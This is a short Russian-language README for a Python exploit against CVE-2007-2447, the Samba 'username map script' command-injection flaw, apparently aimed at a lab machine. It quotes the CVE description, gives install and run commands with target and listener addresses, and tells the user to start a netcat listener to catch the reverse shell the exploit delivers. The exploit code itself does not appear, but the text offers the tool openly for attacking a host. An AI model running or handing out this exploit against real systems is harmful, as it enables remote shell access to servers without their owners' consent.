
Эксплойт на Python для CVE-2007-2447, нацеленный на уязвимость сценария карты имен пользователей Samba, позволяющий удаленное выполнение команд через метасимволы оболочки с доставкой полезной нагрузки обратной оболочки.
«Функциональность MS-RPC в smbd в Samba 3.0.0–3.0.25rc3 позволяет удалённым злоумышленникам выполнять произвольные команды через метасимволы оболочки с участием функции (1) SamrChangePassword, когда включена опция smb.conf «username map script», а также позволяет удалённым аутентифицированным пользователям выполнять команды через метасимволы оболочки с участием других функций MS-RPC в (2) удалённом принтере и (3) управлении файловыми ресурсами.»
[*] Для этого эксплойта требуется Python 3.7 или выше
python3 -m pip install pysmb
$ ./CVE-2007-2447.py --rhost 10.10.10.3 --lhost 10.10.14.10 --lport 4444 --rport 445
--rhost — удалённый хост--lhost — локальный хост--lport — локальный порт--rport — удалённый порт [ * ] Опционально. По умолчанию = 445Не забудьте запустить свой слушатель:
nc -lvnp 4444
